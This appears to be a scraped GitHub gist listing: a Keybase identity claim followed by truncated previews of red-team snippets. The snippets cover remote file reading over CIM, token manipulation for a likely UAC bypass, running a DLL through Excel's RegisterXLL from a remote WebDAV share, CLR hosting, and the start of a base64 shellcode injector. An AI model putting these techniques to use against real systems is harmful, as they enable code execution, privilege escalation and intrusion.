I hereby claim:
- I am rkornmeyer on github.
- I am r0bchain (https://keybase.io/r0bchain) on keybase.
- I have a public key ASCymwg5NS5KC-s99SG-umzYpHKY5lE_WCCZ72XQFv3W0go
To claim this, I am signing this object:
<?xml version="1.0"?> | |
<?xml-stylesheet type="text/xsl" href="script.xsl" ?> | |
<customers> | |
<customer> | |
<name>John Smith</name> | |
<address>123 Elm St.</address> | |
<phone>(123) 456-7890</phone> | |
</customer> | |
<customer> | |
<name>Mary Jones</name> |
$CimSession = New-CimSession -ComputerName 10.0.0.2 | |
$FilePath = 'C:\Windows\System32\notepad.exe' | |
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
$FileLengthBytes = $FileContents.FileData[0..3] | |
[Array]::Reverse($FileLengthBytes) |
DWORD Error, bytesIO; | |
NTSTATUS Status; | |
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
BOOL bCond = FALSE; | |
SHELLEXECUTEINFO shinfo; | |
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
TOKEN_MANDATORY_LABEL tml, *ptml; | |
PSID pIntegritySid = NULL; | |
STARTUPINFO si; | |
PROCESS_INFORMATION pi; |
I hereby claim:
To claim this, I am signing this object:
requirements:
" _ _ " | |
" _ /|| . . ||\ _ " | |
" ( } \||D ' ' ' C||/ { % " | |
" | /\__,=_[_] ' . . ' [_]_=,__/\ |" | |
" |_\_ |----| |----| _/_|" | |
" | |/ | | | | \| |" | |
" | /_ | | | | _\ |" | |
It is all fun and games until someone gets hacked! |
Go to Preferences->Profiles tab. Select your profile on the left, and then open the Keyboard tab. At the bottom is a set of buttons that lets you select the behavior of the Option key. For most users, Esc+ will be the best choice.
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
/* Author: TheWover | |
Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls. | |
Last Modified: 11/1/2018 | |
*/ | |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace ShellcodeTest |